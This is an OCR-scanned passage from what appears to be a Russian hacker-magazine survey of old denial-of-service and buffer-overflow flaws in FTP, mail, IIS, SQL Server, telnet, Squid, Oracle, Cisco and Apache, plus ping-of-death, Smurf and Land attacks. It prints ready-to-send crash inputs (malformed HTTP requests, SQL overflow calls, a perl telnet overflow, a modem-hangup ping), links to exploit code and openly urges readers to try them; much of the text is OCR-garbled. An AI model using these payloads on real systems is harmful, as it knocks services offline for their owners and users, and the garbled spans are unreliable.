../../Му%20е5/*.*”), так этот сервачок еще и подвержен 
DoS нападению. Если сервер получает специально сформиро- 
ванные команды ‘RETR’ или ‘STOR’, то это приведет к 100% ис- 
пользованию процессора и краху сервиса. Для нормальной 
работы требуется перезапуск сервера. Эксплойт можно посмо- 
треть по этой ссылке: http://securitylab.ru/?1D=26796. 
Автор: SecurityLab 

Система: TYPSoft FTP Server 0.97.1 

Патч: на сайте проги об этом молчат... партизаны... 


Microsoft FTP-cepsep 

Микрософт отличился и тут... ЕТР-сервак из IIS уязвим к OTKa- 
зу от обслуживания в команде STAT. DoS может быть вызван 
удаленным нападающим, который имеет учетную запись на 
ЕТР-сервере (в т.ч. и анонимную). Успешное применение уяз- 
вимости приводит к аварийному завершению работы ЕТР-сер- 


вера. Пример: STAT ?*<240xX> (полный эксплоит: 
http://www.xakep.ru/post/15038/exploit.txt). Уязвимость свя- 
занна с переполнением буфера, однако любые попытки экс- 
плуатировать ее приводят к перезагрузки inetinfo.exe. 


03Ч 


Автор: найдено на сайте ксакепа 
Система: Microsoft Internet Information Server 4.0-5.1 
Патч: М502-018 


Dos для Broker FTP server 


В Broker FTP найдена возможность DoS-ataku, используя пери- 
одически команду cwd .... Эффект увеличивается, если между 
точками добавить несколько пробелов. Эксплоит закачивается 
тут: http://securitylab.ru/?ID=25161. 

Автор: SecurityLab 

Система: Broker FTP 5.9.5.0 

Патч: нету 


Serv-U FTP Server уязвим к атаке NULL 
byte(DoS) 


Посылка на фтп-сервер Serv-U строки, содержащей большое 
количество нулевых байтов, приводит к ошибке стека. Для ре- 
ализации уязвимости не требуется знать правильную комбина- 
цию имя пользователя/пароль. 

Автор: Blue Panda (bluepanda@dwarf.box.sk) 

Cuctema: FTP Serv-U 2.5e 

Патч: сделать апгрейд до следующей версии 


DoS ДЛЯ MAIL-CEPBEPA 


Argosoft Mail Server 


Argosoft Mail Server Pro (http://www.argosoft.com/applica- 
tions/mailserver/) содержит встроенный НТТР-сервер для web- 
mail-goctyna. Без предварительной регистрации нападающий 
может получить доступ к любому файлу на диске или подве- 
сить сервер, добавляя к запросу последовательность “/.. “ по- 
сле пути к картинкам webmail-cepBepa или почтового вложе- 
ния для законного пользователя (который в настоящее время 
активен в системе). Эсксплоит на: http://nfinity.yoll.net/ 
Автор: team n.finity (nfinity@gmx.net) 

Cuctema: Argosoft Mail Server Plus / Pro <= 1.8.1.5 

Патч: http://www.argosoft.com/applications/mailserver/ 


ESeru 


EServ - это комбинация из Mail, News, Web, FTP и Proxy Server 
для систем Microsoft Windows 9x/NT/2000. Описание баги в 
этой программе можно найти по адресу: http://ntsecurity.nu. 
Автор: Arne Vidstrom, http://ntsecurity.nu 

Система: EServ 2.97 и более ранние 

Патч: ftp://ftp.eserv.ru/pub/beta/2.98 


Exchange 2000 


Некорректный почтовый атрибут приводит к 100% использо- 
ванию ресурсов CPU в Exchange 2000. 

Так как эту багу нашли сами микрософтовцы, то эксплоита най- 
ти не удалось... 

Автор: Микрософт 

Система: Exchange 2000 

Патч: http://www.microsoft.com/technet/security/ 
bulletin/MS02-025.asp 


Переполнение Буфера в Atrium Software 
Mercur Mail Server 

Уязвимость защиты в программе позволяет отдаленным зло- 
умышленникам вызывать переполнение буфера с возможнос- 
тью выполнения потенциально опасного кода. Небольшую 
прогу на си для реализации этой дырки можно скачать на 
http://securitylab.ru/?1D=26308. 

Автор: Martin Rakhmanoff (martin@direct.spb.ru) 

Cuctema: MERCUR SMTP-Server v3.30.03 

Патч: отсутствует 


Эксплоит, реализующий DoS против inetinfo.exe 


Эта ошибка затрагивает все системы Windows 2000, выполняю- 
щие $МТР-службу, которые не применили hotfix для MSO2-012. 
Exchange сервер также уязвим, т.к. использует тот же самый 
$МТР-компонент. Успешная эксплуатация этой уязвимости 
приводит к аварийному отключению всех сервисов, выполня- 
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ющихся под inetinfo.exe, в т.ч. IIS, FTP, Gopher и т.д. Эти сер- 
висы будут автоматически перезагружены, однако любые уста- 
новленные сеансы будут потеряны. Эксплоит отсюда: 
http://securitylab.ru/?ID=29320. 

Автор: SecurityLab 

Cuctema: Windows 2000 

Патч: хотфикс М502-012 


DoS для MS SOL сервера 


Переполнение Буфера в Microsoft SOL 
Server 2000. 

MS SQL сервер содержит две недокументированные функции 
кодирования пароля, pwdencrypt и pwdcompare. В одной из 
этих функций, pwdencrypt(), обнаружено переполнение буфе- 
ра: SELECT pwdencrypt(REPLICATE(‘A’,353)). Для успешного вы- 
полнения уязвимости атакующий должен получить непривиле- 
гированный доступ к базе данных. Подробности тут: 
http://securitylab.ru/?ID=31472 

Автор: Martin Rakhmanoff (jimmers) jimmers@yandex.ru 
Система: Microsoft SQL Server 2000 (up to SP2). 

Патч: поставить сервис пак 3 


Переполнение вУуфера в Lumigent Log 
Explorer 
Lumigent Log Explorer - эксплорер журнала транзакций для 
Microsoft SQL Server 7/2000. Программа поставляется с допол- 
нительными сохраненными процедурами, хранящимися в 
p_logattach.dll. Некоторые их этих процедур уязвимы к уда- 
ленному переполнению буфера и потенциально к выполнению 
произвольного кода. 
Пример: 

declare @bo varchar(8000) 

set @bo = replicate(‘A’, 800) 

exec xp_logattach_StartProf @bo 

declare @bo varchar(8000) 

set @bo = replicate(‘A’,800) 

exec xp_logattach_setport @bo 

declare @bo varchar(8000) 

set @bo = replicate(‘A’,800) 

exec xp_logattach @bo 
Cuctema: Lumigent Log Explorer version 3 
Патч: мелкософт молчит, a спецы советуют давать доступ к 
журналу только проверенным людям 


DoS в Microsoft SOL Server 2000 


В Microsoft SQL Server 2000 обнаружено годное для удаленно- 
го использования переполнение буфера в функции 
OpenDataSource в комбинации с MS Jet Engine. Так как пробле- 
ма связана с Jet Engine, другие программы, использующие Jet, 
также могут быть уязвимы. Создавая специально обработан- 
ный SQL запрос, используя функцию OpenDataSource, можно 
вызвать переполнение буфера в процессе SAL Server, получая 
удаленный контроль за выполнением процесса. Любой код бу- 
дет выполнен с системными привилегиями. Так как перепол- 
нение связанно с Unicode кодированием, оно очень просто в 
эксплуатации. Уязвимость может использоваться через Web 
сервер, уязвимый к внедрению $01 кода. Нехитрый эксплоит 
(http://securitylab.ru/?ID=31578), создает файл SQL-ODSJET- 
ВО на диске “c:”. 

Автор: David Litchfield (david@ngssoftware.com) 

Система: Microsoft SQL Server 2000 sp0-sp2 

Патч: сервис nak 3 


DoS ПОНЕМНОННУ 


Переполнение вуфера в telnet сервере 
Microsoft 

Microsoft поставляет Telnet-cepBep с несколькими программа- 
ми. Реализация этого сервера в Windows 2000 и Interix 2.2 со- 
держит переполнение буфера в коде, который обрабатывает 
обработку опций telnet-npotokona. Уязвимость позволяет на- 


падающему выполнять произвольный код с системными пра- 
вами. DoS происходит, если буфер, в который заносится имя 
пользователя при входе в систему, превышает 4300 знаков, и 
посылаемый код содержит 127(0x7b, backspace). Это приведет 
к краху сервера с ошибкой 0х41414141. Проверить на багу 
можно с помощью двух строчек 

perl -e ‘{printf “%s\x7f%s”,"A"x4500,"A"x100}’ 

telnet victimbox 

Автор: 

Система: Windows 2000 и Interix 2.2 

Патч: http://www.microsoft.com/technet/security/bulletin/ 
М502-004.а5р 


SHOUTcast 


SHOUTcast - \\Мпатр-основанная система потокового аудио от 
Nullsoft (или, по-простому, инет-радио), которая содержит пере- 
полнение буфера, а также уязвимость защиты, которая позволяет 
злоумышленникам разрушить сервер, посылая ему семь длинных 
запросов, длиной около 4 Кб каждый, внутри НТТР-запроса. Уяз- 
вимость позволяет получить полный доступ к бажной системе. На- 
падавший должен знать DJ пароль, чтобы осуществить эту уязви- 
мость. Это ограничивает воздействие уязвимости, однако, если, 
например, shoutcast-cepBep выполняется как корень, DJ может по- 
лучить привилегии корня. Переполнение происходит при посылке 
следующих данных 8001-му порту: 

password\n 

icy-name: netric 

icy-[doesn’t matter]: [buffer] 

Hy а полный эксплоит валяется по адресу 

http://www. netric.org/exploits/mayday-linux.c для версии 1.8.9 

и http://securitylab.ru/?1D=26236 для версии 1.8.2. 

Автор: eSDee of Netric (www.netric.org)/FraMe (frame@hispal- 
ab.com) 

Cuctema: Nullsoft SHOUTcast 1.8.2/1.8.9 

Патч: искать инфу на официальном сайте SHOUTcast’a в фору- 
ме техподдержки 


DoS для Wingate 


Wingate страдает от уязвимости защиты, которая позволяет OT- 
даленным злоумышленникам вызывать DoS против машины, 
выполняющей Wingate 4.01. Программа не способна обрабо- 
тать большое количество подключений, которые посылают | 
данные MSG_OOB. Эксплоит без труда можно найти, введя в 
браузер следующую шняжку: http://securitylab.ru/?1D=26357 
Автор: человек с ником god 

Система: Wingate 4.01 

Патч: апгрейд до следующей версии 


Уязвимость в Aolserver 3.0 


Aolserver 3.0 разрушается, если ему переслать длинную строку 
авторизации. Также, возможно, эта уязвимость позволяет ха- 
керу выполнять произвольный код через переполнение буфе- 
ра. Эксплоит тута: http://securitylab.ru/?ID=26231. 

Автор: SecurityLab 

Система: Aolserver 3.0 

Патч: тока в следующей версии 


ЗЫ 

Я рассказал тебе только про маленькую часть изъянов, най- 
денных в разных версиях серверов под винды. Найти больше 
ты сможешь только в инете, а помогут тебе в этом несколько 
следующих ссылочек: 

http://bugtraq.ru 

http://hack-info.ru 

http://security.nnov.ru 

http://uinc.ru 

http://securitylab.ru 

http://void.ru 

htp://xakep.ru 


= 


Так что изучай... в познавательных целях :). т 
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Alex Shark (qqqqqwww@ring.by) 05-атака считается самой грубой атакой в сети. Фи- 


нальный результат атаки - падение, зависание или 
просто отключение какой-либо части сервера. Как 
правило, уязвимости данного типа происходят из-за 
недочетов программистов, которые написали сервер. На на- 
стоящий момент нет ни одной системы, против которой нель- 
зя было бы осуществить DoS-ataky. Самой надежной систе- 
мой остается по-прежнему забетонированная гиря без ручки 
(чтоб на ногу не уронить случайно). Если, например, на ХР- 
сервер еще не нашли дырку, то это всего лишь значит, что у 
Hero еще все впереди :). Так что задо5` ить можно все, что 
угодно. И ты это сам поймешь, когда прочитаешь этот неболь- 
шой обзор Во5-уязвимостей. 


WIN-DoS 

Начнем с любимой мастдайки. Первый Ha очереди у нас IIS 4, 
входящий в комплект NT-4.0 Server, и долгое время на серве- 
pax с МТ-ей именно он и стоял. Позже начали устанавливать 
Apache по причине большей надежности и открытого кода (а, 
следовательно, полной бесплатности). Дырка была обнаруже- 
на ребятами из еЕуе. Основана на неправильной обработке 
запроса файла с расширением НТК. В оригинале данный баг 
(переполнение буфера) должен давать доступ на чужую тачку, 
но в четырех случаях из пяти происходит банальный обвал 
сервака с последующим зависанием. Можно завалить и рука- 
ми, послав телнетом: 


POST /tralala.htr HTTP/1.0 
Host: www.server.com 
Transfer-Encoding: chunked 
АААААААААА (и так 1-3 кило :)) 
[enter] [enter] 


Брать тут: 

Exploit: 
www.eeye.com/html/Research/Advisories/AD20 
020612.htm1 

Patch: www.microsoft.com/technet/securi- 
ty/bulletin/MS02-028.asp 


Следующая стадия развития IIS - версия 5. Ставится вместе с 
2000-Server. И тут не все гладко. Первая дырка появилась при 
обработке внутреннего поля запроса Content-length - в этом 
поле лежит длина передаваемых данных. Так вот, если туда 
написать 5300000, то независимо от того, полетят вслед за за- 
просом сами данные или нет, сервер выделяет память под них 


(сначала в КАМ, потом на винте) на пять метров с копейками. 
Cam запрос достаточно короткий: 


GET /index HTTP/1.1 
Hoses 192,168.01 
Connection: Keep-Alive 
Content-Length: 5300000 
Authorization: Basic 
AAAAAAAAAAA 


Послав это на сервер, ты заставишь его отожрать 5300000 с 
небольшим байт в своей памяти. Как видно, посылать можно 
хоть telnet’ om. Скорость отжирания памяти просто дикая. OT 
сотни таких запросов сервак (P3-750/256Mb/64k-bit) вышел 
из себя и в течение двух часов не вернулся обратно - при- 
шлось ребутить :). 


Брать тут: 

Exploit: 
www.security.nnov.ru/files/IISContent.pl 
Patch: www.microsoft.com/technet/security/ 


Очередная дырка относится и к IIS 4, и к IIS 5, но только в том 
случае, если запущена поддержка FrontPage (FrontPage Server 
Extension). Дыра отлично работает благодаря неправильному 
обращению к модулю авторизации (author.dll), который запу- 
скается при обращении к shtml файлам. При отправке непра- 
вильного запроса на сервер с №Т4 файл inetinfo.exe просто 
выпадает. На 2К-виндах данный агрегат не падает, а начинает 
жутко тормозить. По заверениям Microsoft, файлец должен 
сам себя перезагрузить, но на практике этого не происходит, в 
результате чего достучаться до сервака можно, но на запросы 
он никак не отвечает. Самое интересное - отключение аутен- 
тификации в FrontPage не решит проблему :). Для ее решения 
мелкософтовцы советуют полностью снести FrontPage (xopo- 
шо - не посоветовали винт форматнуть) или загрузить патчик. 
Нашли эту дырочку все те же ребята из еЕуе. Дыра реально 
проверялась и забавно работает. Эксплоит они, если сказать 
честно, недоделали. Поэтому делается все так: запускается 
наша любимая хакерская программа telnet, начинается кон- 
нект с серваком. Далее пихается в телнет текст того самого 
эксплоита. Все, можно запускать браузер и наблюдать, а точ- 
нее не наблюдать, итоги работы дырки. 

Брать тут: 

Exploit: http://www.el 
sories/FPDOSNT4.txt для NT4 

Exploit: http://www.eEye.com/html/advi- 
sories/FPDOSNT4NT5.txt для 2k 

Patch: www. microsoft.com/technet/security/bulletin/ms00-100.asp 
И последняя Ha сегодня дырочка в мастдайке. На этот раз 
расковырял ee Georgi Guninski, который больше специализи- 
руется по ковырянию всяких ТЕ и NN. На этот раз мелкомяг- 
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DoS-YA3BUMOCTU 


ких подвела реализация xml и запроса PROPFIND. Вот что Ha- 
до послать серверу: 


<?xml version="1.0"?> 

<a:propfind xmlns:a="DAV:" 
xmlns:u="over:"><a:prop><a:displayname 
/><и:ДАННЫЕ /></а:ргор> 

</a:propfind> 


Вместо слова "ДАННЫЕ" надо вписать примерно 130 кило че- 
пухи (любой - хоть букву "А"). При первом запросе вылетит 
ошибка 500, при втором запросе сервачок перезагрузится :). 
На самом деле это не чистый 005, потому как тут происходит 
BufferOverflow, а, следовательно, теоретически возможно 3a- 
пустить любой (или почти любой) код на сервере. Но в насто- 
ящее время это никем не осуществлялось. На страничке авто- 
ра есть эксплоит (на перле), так что можно брать и изучать. 


Брать тут: 

Exploit: www.guninski.com/iispropover.html 
Patch: www.microsoft.com/technet/securi- 
ty/bulletin/MS01-016.asp 


ЛИНЬ-Оо5 

Теперь переходим к другому виду систем - к Linux и его семей- 
ству. Многие считают, что данный вид систем более надежный 
по сравнению с Windows. Однако по сравнительной статисти- 
ке в Ипих-совместимой системе многие баги, который удалось 
найти до настоящего момента, давали root-npaBa, а, следова- 
тельно, полный контроль над системой. Связано это, прежде 
всего, с более простой (с точки зрения программиста) реали- 
зацией удаленного доступа к системе. То есть система изна- 
чально рассчитывалась так, чтобы не было большой разницы, 
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сидишь ты рядом с серваком или соединен через пол земного 
шара no TCP/IP. 


Итак, первая дыра - достаточно старая, но была часто юза- 
ема. Именно благодаря ей ложился практически любой 
сервер. Эту дырочку нашли 1Opht (ныне зовутся @stake). 
Живет она в PHP3- и РНР4-серверах. Срабатывает при 
ошибке, точнее - при записи этой ошибки в [09-файл. Тип 
уязвимости - так называемый format string Vulnerability, то 
есть специально созданный запрос на сервер вызывает 
сбой у него в мозгах. Запрос очень большой, потому приве- 
ду только ссылку Ha exploit. В настоящий момент большин- 
ство серваков пропатчено :(. 


Брать тут: 

Exploitl: 
www.security.nnov.ru/files/apache.c - про- 
тив Apache с подрубленным php 

Exploit2: 
www.security.nnov.ru/files/7350cowboy.c - 
работает против PHP3 

Exploit3: www.security.nnov.ru/files/phpx- 
pl.c - этот валит и PHP3, и PHP4 


Patch PHP3: www.php.net/distributions/php- 
3.0.17. tarigz 
Patch PHP4: 


www.php.net/do_download.php?download_ file= 
php-4.0.3.tar.gz 

Следующий проект - OpenSSH - был поломан неким Joost 
Pol. В идеале ошибка в OpenSSH должна давать зарегистри- 
рованному пользователю root-npaBa, но при тестировании 
все, что удалось добиться, - это падение сервака (иногда 
просто отключение данного сервиса, а иногда - уход в пол- 
ный даун со стопроцентной загрузкой). Патч ребята выпус- 
тили достаточно шустро, но, как это часто бывает, при уста- 
новке "по умолчанию" никто за патчами не лезет. Так что ес- 
ли есть открытый порт, можно посмотреть и версию (за 
спрос денег не просят), и, если она находится в промежутке 
между 2.0 и 3.0.2, то должно сработать :) - первая патчен- 
ная версия 3.1. Многие админы не любят оставлять telnet, 
однако практически все любят ставить SSH, считая его более 
надежным. Как показала практика, для падения сервера не 
всегда необходим даже зарегистренный пользователь. При- 
чина бага - buffer overflow. Реализация - как всегда - шлет- 
ся больше, чем ждут, на что сервер обижается и падает. 


Брать тут: 

Exploitl: 
www.security.nnov.ru/files/osshchan.tgz 
Exploit2: 
www.security.nnov.ru/files/x2.tgz 

Patchl: www.openbsd.org/cgi- 
bin/cvsweb/src/usr.bin/ssh/channels.c.diff 
?ril=1.170&r2=1.171 

Patch2: www.pine.nl/advisories/pine-cert-— 
20020301.patch 


Если у тебя в сетке есть любители почитать чужую KOppe- 
спонденцию, то знай, как правило, все (даже самые наво- 
роченные) линуховые сниферы используют Sniffit или 
Dsniff. Сейчас ты узнаешь, как бороться с первым из них 
Этот снифер имеет встроенную функцию перехвата e-mail- 
заголовков, потому очень удобен для прочтения чужой 
почты. Так вот, именно в ней и живет наша бага. Дырку эту 
нашли достаточно давно, однако с тех пор более новых 
версий так и не вышло. 


Брать тут: 

Exploitl: 
online.securityfocus.com/data/vulnerabili- 
ties/exploits/sniffit.c 


> 
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i 
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Hxpiloat2: 
online.securityfocus.com/data/vulnerabili- 
ties/exploits/5niffi7.c 

lp-qeul@ylic S$} 3 
online.securityfocus.com/data/vulnerabili- 
ties/exploits/sniffit-ex.c 

Если у нас установлен Бер1ап-проект, 
INSLAMCUL ANSE Sans лвла а 

Patch: ftp.debian.org/debian/dists/sta- 
ple /migula/souKce/mer/Smulirilie О.Э. 7 joete= 
бо По ge 


Ane) 


Если же у нас просто исходники, то будем патчить сами. В фай- 
ле sn_analyse.c в строках 163 и 175 меняем функцию strcpy на 
strncpy и прописываем примерную длину адреса. Это не луч- 
ший вариант, потому что слишком длинные адреса будут уре- 
заны, но это все же лучше неработающего снифера. 


Теперь давай поглядим, как ломаются proxy, если это SQUID 
2.2 или 2.4 любой версии, даже с пометкой "STABLE" :). Чест- 
но говоря, не могу себе представить, как тестируют сервер для 
того, чтобы ему дать пометку "стабильный". Этот сервер пада- 
ет от следующего: любимым telnet’ om коннектятся к прокси- 
ку (по умолчанию порт 3128) и пишут туда следующее: 


РОТ 
ftp://server.com/here/my/home/page/1/2/3/ 
УР. ab 

Content-type: application/octet-stream 
Content-length: 0 

Pragma: no-cache 

[enter] [enter] 


Все! Прокся лежит! Baca Пупкин решил залить файлы Ha свою 
хом-пагу через проксю, для этого сначала решил создать ди- 
ректорию (последнее время зовутся папками) "3", и все! Была 
прокся у Васи, и нет больше прокси. По-моему это просто глюк 
бета-тестирования. 


Враще тит 

Hp.qoulreyalic & 
www.security.nnov.ru/files/sq xpl.c 
Patch: www.squid-cache.org/bugs/showat- 
tachment .cgi?attach id=38 


И еще один глюкавый шедевр для линуксоидов - всем извест- 
ный wu-ftp, который был сделан на основе РгееВ$0` шного 
сервера и долгое время считался самым надежным, если не 
сказать единственным надежным, ЕТР-сервером. А ломаться 
он начал на версии 2.6.1. Причем очень просто - достаточно 
зайти любым пользователем (даже anonymous) на сервер, на- 
брать "ls ~{" и наслаждаться упавшим сервером. 

Securityfocus даже не стали выпускать для этого дела exploit, 
потому как уронить сервер мог любой человек, с любой плат- 
формы. Самое простое - это набрать в браузере адрес 
"ftp://ftp.server.com/~{" - и сервер ftp.server.com уходит в 
глубокий даун с отрубанием ftp на корню. Для каждой версии 
сервера патчик нужен свой, потому приведу ссылку на страни- 
цу с патчами для разных версий. 


Брать тут: 
Patch: online.securityfocus.com/advi- 
sories/3680 


ALL-DoS!! 

А сейчас давай поговорим о "неломаемом". Прежде всего, нет, 
никогда не было и не будет "неломаемых" систем. Есть просто 
системы, которые пока никто не смог сломать :). Ну да ладно, 
к чертям философию - перейдем к практике. 

Первая глюка - это модемный баг. Какая бы навороченная 
ось ни стояла, будь то линукс, последний юникс или прими- 
тивная мастдайка, если жертва сидит на DialUp e и пытается 
кидать пальцы, есть реальная возможность заставить его пе- 
резвонить :). Если у него ZyXEL или он читает Х, то, скорее 
всего, ничего не получится. Но попробовать стоит ;). Есть та- 
кая хорошая команда - ping, так вот, согласно RFC то, что в 
ping’ e прилетело, то и должно быть послано обратно в отве- 
те. А еще есть хорошая команда модему - "+++", которая го- 
ворит ему, что следующие данные не для пересылки, а для 
него самого. То есть если послать "+++АТН" во время работы 
в Инете, то мопед перейдет в режим приема данных "для не- 
го" и по команде "АТН" положит трубу. Так что перед исполь- 
зованием данного метода пропатч свой мопед, если же у те- 
бя зюхел, то тебе неслыханно повезло, у него между "+++" и 
"АТН" должна быть задержка не меньше 0.3 секунды, а это 
вполне достаточно для устойчивости против обвала. Итак, 
суть в следующем: посылается пинг с содержанием 
"+++АТНО", и при ответе вражеский модем бросает трубу, 
жертва перезванивает. Под линухом команда ping сама по 
себе exploit, потому как имеет параметр -р для посылки дан- 
ных. Достаточно набрать "ping -p2B2B2B41544830 ТР_жерт- 
вы", и dial-up перейдет в состояние redial-up :). Для виндов 
придется скачать программульку отдельно. 


Брать тут: 


Exploitl: newdata.box.sk/2000/hangping. zip 
Exploit2: newdata.box.sk/xcoder/rock- 
etvl_0.zip 

Patch: В строке инициализации модема надо 


прописать ATS2=255 
деленку :). 

Теперь давай посмотрим на нашего провайдера. Заходим на 
страничку, где они хвастаются своим "оборудованием", и 
читаем router Cisco 7500. Хорошая железка, дорогая, но ло- 
мается. Ломается она от неправильного (это они так дума- 
ют :)) пакета SNMP. После чего маршрутизатор, а, следова- 
тельно, и та часть сети, которая висит за ним, просто пере- 
стает работать. Если роутер один, значит вся сеть будет 
просто отрезана от внешнего мира. Ни войти, ни выйти. Вот 
был провайдер - и нету. 


(а лучше поставить вы- 


Брать тут: 

Exploit: 
online.securityfocus.com/data/vulnerabili- 
ties/exploits/ciscokill.c 

Patch: 
online.securityfocus.com/bid/4132/solu- 
tion/ 


(Следующая "неломаемая" вещь - это Oracle. Это тот самый cep- 
вер баз данных, на котором сидит FBI и прочие, тот самый, ко- 
торый прошел всю возможную сертификацию по безопаснос- 
ти и признан "наиболее надежным". Именно Oracle использу- 
ют в тех местах, где от компьютерных данных может зависеть 
жизнь человека. И именно его можно ломать. Дырка проявля- 
ется в самом начале авторизации, а, следовательно, для ее 
юзанья не требуется регистрация пользователя. Найдена она 
была PGP Security. Если сервер запущен Ha Нпих-платформе, 
то его можно просто уронить, но если сервак стоит на win, то 
можно получить еще и полный контроль над системой с пра- 
вами пользователя от имени которого был запущен сервак :). 
Ломабельные версии 8.1.5, 8.1.6 и 8.1.7. 


| Брать тут: 


Exploit: www.security.nnov.ru/files/8iwas- 
breakable.c 
Patch: metalink.oracle.com (патч номер 


1489683, выдадут только после регистрации) 
Если же стоит версия 8.0 этой неломаемой базы, то все ста- 
новится еще проще. Достаточно телнетом сконнектиться на 
порт 1521 и написать любую туфту, какая только придет в 
голову, и сервак послушно ложится, потому как горестно за- 
думывается над смыслом жизни, разбирая этот пакет непо- 
нятных данных. При этом патч под версию 8.0 не выпускал- 
ся, а в качестве заплатки предлагают обновить версию сер- 
вера до 8.1 или выше. 


Брать тут: 

Hxploit; 
www.security.nnov.ru/files/kick orcl.pl 
Patch: Только Upgrade до версии 8.1 и 
выше. 


А что такое линукс, ты знаешь? Правильно - это как вигвам: 
без окон, без дверей, с апачем внутри. Сейчас будем смот- 
реть, как выгонять этого назойливого индейца из жилища. 
Нет, вигвам поджигать не обязательно, просто достаточно 
накидать ему MIME-3anpocos, и если он их не разгребет - a OH 
их точно не разгребет, то сам вылетит. Да еще и с треском, 
потому как попортит себе лог-файлы на выходе. Как уже го- 
ворилось, нет надежных систем, и мнение о том, что Apache 
неломаем, тоже ложно. Ломаются версии 1.3.1 и 1.2.5. При 
этом лечению не подлежат ввиду отказа производителя от 
сопровождения данных версий. То есть лечится только пере- 
ходом на другую версию. 


Брать тут: 

Hxploit; 
online.securityfocus.com/data/vulnerabili- 
ties/exploits/mimeflood.pl 

Patch: Upgrade до версии 1.3.2 или выше. 
Ломается все! XFree, хоть меня и побьют пингвиноиды, но это 
есть жалкое подобие форточек под линухом, которое падает 
от кривого пакета в 6000 порт. Этот порт по умолчанию откры- 
вается с запуском иксов. При падении вслед за сервером XFree 
улетают проц (100% загрузки), мышь и клава (молчат мерт- 
во!). При сканировании близлежащих провайдЫров везде, где 
был запущен Linux, был запущен и Х-сервер. Падучие версии: 
31315) (iH) Sesh. 


Брать тут: 

Houten 
online.securityfocus.com/data/vulnerabili- 
ties/exploits/xserverdos.c 


PeneGlap 
http: //online.securityfocus.com/bid/1235/s 
olution/ (там много - выбирай...). 


Как видишь, 0о5-уязвимости есть везде и во всем :). Что и тре- 
бовалось доказать. Так что дерзай. Удачи тебе в изучении пе{- 
work security! Еще увидим ся ;). ac 
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Ping of death 


Уязвимы: все непропатченные оси 
Тип: насыщение полосы пропускания + недостаток ре- 
сурсов + ошибки программирования 

Самая простая, но тем не менее до жути универсальная 
атака. Суть ее в пинговании удаленной машины пакетами 
нестандартного и достаточно большого размера. Сама по 
себе команда ping посылает пакеты «echo-request» разме- 
ром в 20 октетов (1 октет - это восемь бит), где хранятся 
только адрес и служебная информация, и неутомимо ждет 
пакетов «echo-reply» от той машины, на которую засыла- 
лись реквесты. Типа так проверяется скорость и качество 
связи. Вроде бы и все, но нам оставили маааленькую фичу, 
пригодную для дестроя всех и вся. Чтобы сымитировать ре- 
альную ситуацию, в опциях ping’a можно задать размер па- 
кета (вдруг мелкие пакетики проходят без проблем, а на 
больших объемах данных канал возьмет и рухнет?). А нам 
того и надо, ведь посылать большие пакеты умеют все, а вот 
грамотно их обрабатывать - немногие %). Максимальный 
размер пакета составляет 65536 байт, но при помощи ле- 
вых прог можно отправить пакет большего объема. Вот за- 
падло, а :)? Если комп не справляется с составлением реп- 
лая на такой реквест, его ждет В500 и вечная память. Со 
стандартным пингом тоже можно попробовать похулига- 
нить, достаточно задать размер пакета достаточно боль- 
шим, но не делящимся на двойку (типа 65527). Не факт, что 
он тоже будет обработан правильно :). И самое главное - 
если вражеский комп пропатчен и грамотно отсеивает ле- 
вые пакеты, можно запросто забить ему канал, не прекра- 
щая атаки в течение большого промежутка времени. Если у 
атакующего канал шире, а коннект лучше - атакуемого по- 
любому ждет вынужденная перезагрузка. Ведь работать в 
условиях полной забитости просто невозможно :). 


SSPing 

Уязвимы: Win95+WinNT 

Тип: ошибки программирования 

Этот метод тоже использует протокол ICMP, занимаясь фак- 
тически тем же пингом удаленной системы. На этот раз 
прикол заключается в грамотном использовании фрагмен- 
тации пакетов ТСМР. Любой большой пакет при проходе че- 
рез маршрутизатор разбивается на более мелкие части, а 
соберется ли он в одно целое на атакуемой машине - боль- 
шой вопрос. SSPing занимается посылкой по айпишнику 
друга или недруга сразу кучи сильно фрагментированных 
здоровых пакетов. Атакуемый компьютер пытается выдрать 
из стека TCP/IP инфу о сборке пакета, но, естественно, не 
находит ее :). А ккомпу уже летят новые пакеты, жаждущие 
обработки. Глюк, переполнение буфера, висяк. Главная за- 
ковыка - атаки SSPing очень сложно отследить, так как 
фрагментированные пакеты для сети - дело обычное, а 
поймать хаксора по айпишнику вообще нереально - после 
атаки комп вырубается, а соединение, соответственно, 
рвется. И хотя Microsoft давно поправила организацию 
стека в своих системах, надежда на успешность атаки оста- 
ется - в сети еще много компов, живущих под МТ без серви- 
спаков и даже под 95-ми. Не веришь? Судя по статистике 
моей странички, таких аж 12%. Ищи, и все будет ОК. 


Smurf 

Уязвимы: почти все оси и маршрутизаторы 

Тип: полоса пропускания 

Наиболее массовая атака из всех пинговых. Самое страшное, 

что на данный момент от зтигРа не существует эффективной 

защиты :). В чем фишка: в любой сети обязательно сущест- 
вует бродкаст адрес, который дублирует посланные на не- 

го сообщения ВСЕМ компьютерам в сети (*.255.255.255 
для сети класса А, *.*.255.255 для сети класса В и 

так далее). А теперь представь себе, что кто-то 
начнет жестоко пинговать этот адрес здоровен- 


ными пакетами. Да еще и айпишник в заголовке липовый 
(хотя лучше не липовый, а реальный, принадлежащий жерт- 
ве). В итоге каждый из компов, получивших замечательный 
запрос, ответит на него... жертве. Отсюда страшная загру- 
женность подопытной сетки и возможная смерть компа- 
жертвы от перенапряжения. Заметь, что Smurf-aTaky можно 
усилить в несколько раз, если найти комп, позволяющий от- 
сылать ТСМР-запросы не только по локалке, но и во внеш- 
нюю сеть. Нехилый списочек таких бродкастеров ты найдешь 
Ha http://www.pulltheplug.com/broadcasts.html. Если соста- 
вить грамотный список широковещательных адресов и про- 
пинговать их от имени жертвы, то этой самой жертве при- 
дется несладко :). Как я уже говорил, абсолютной защиты 
от зтигРа обеспечить нельзя, зато слегка обезопаситься 
реально: если в сетке стоит игнор на широковещательные 
пакеты, атака не пойдет дальше ее маршрутизатора. Из-за 
широкого распространения smurf-aTak многие стали отклю- 
чать бродкастеры, но... все не поотключаете, мать вашу! 
Даешь smurfing для народа! 


Land 


Уязвимы: все непропатченные оси 

Тип: маршрутизация 

Поднимемся на уровень выше - нас ждут многочисленные ба- 
ги протокола ТР. Land работает следующим образом: на ата- 
куемую машину отправляется пакет ТСР SYN с секретом. Отли- 
чие 5У№-пакета от обычного в установленном бите синхрони- 
зации - это означает, что пакет будет гордым представителем 
новой цепочки данных. А секрет его вот в чем: адреса отпра- 
вителя и получателя совпадают, а равно совпадает и порт пе- 
редачи. В итоге получивший такой пакетик комп немедленно 
отправит подтверждение: готов к связи и все такое. Только 
отправит он его себе %). А получив, надолго задумается - на 
хрена ему коннект с собой, любимым? Тем более, что он его 
не заказывал... Снова приятный эффект висяка. Жалко, что 
